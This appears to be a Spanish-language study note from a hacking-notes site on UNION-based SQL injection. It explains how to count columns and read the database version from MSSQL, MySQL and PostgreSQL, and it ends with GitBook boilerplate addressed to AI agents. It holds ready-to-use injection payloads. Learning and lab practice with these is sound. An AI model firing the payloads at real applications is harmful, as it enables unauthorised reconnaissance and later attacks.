> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/sql-injection/identifying-dbms-version-mysql-mssql-postgresql.md).

# Detección de versión de DBMS (MySQL, MSSQL, PostgreSQL)

### Ataque de inyección SQL, consulta del tipo y la versión de la base de datos en MySQL y Microsoft

* **Contexto / Vulnerabilidad:** `category` filtro vulnerable a inyección SQL; la aplicación concatena el valor del usuario en `WHERE` cláusula. Usando `ORDER BY` / `UNION` permite enumerar el número de columnas y luego extraer un valor de versión.
* **Objetivo:** mostrar la cadena de versión del SGBD.
* **Metodología rápida:**

1. **Determina el número de columnas**:/ Carga útil:

   ```sql
   ' ORDER BY 2-- -
   ' ORDER BY 3-- -
   ```

* (incrementa el índice hasta que provoque un error para encontrar el número exacto de columnas).

2. **Validar UNION** (elige una `UNION SELECT` con el mismo número de columnas): / Ejemplo mínimo de 2 columnas:

   ```sql
   ' UNION SELECT '1','2'-- -
   ```
3. **Recuperar la versión** — usa la función/variable adaptada al motor.

**Cargas útiles objetivo:**

* **Microsoft SQL Server (MSSQL)** — variable del sistema: `@@version`

  ````
      ```sql
      ' UNION SELECT '1', @@version-- -
      ```
  *   **MySQL** — función: `version()` (o variable `@@version`)

      ```sql
      ' UNION SELECT '1', version()-- -
      ' UNION SELECT '1', @@version-- -
      ```
  *   **PostgreSQL** — función: `version()`

      ```sql
      ' UNION SELECT '1', version()-- -
      ```
  ````

> Ajusta el número de columnas y el orden de las columnas según la consulta vulnerable (p. ej., UNION SELECT NULL, version() si hay tipos diferentes). Usa NULL para las columnas cuyo tipo no deba coincidir si es necesario.

* **Interpretación:** La página mostrará la cadena devuelta por `@@version` / `version()` (por ejemplo, `Microsoft SQL Server 2019 (RTM) - 15.x...`, `5.7.33-0ubuntu0.18.04.1`, `PostgreSQL 13.3 on x86_64-...`), lo que permite la identificación del SGBD.
* **Impacto:** divulgación de información útil para dirigir exploits específicos de versión, mayor riesgo de ataques posteriores.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/sql-injection/identifying-dbms-version-mysql-mssql-postgresql.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
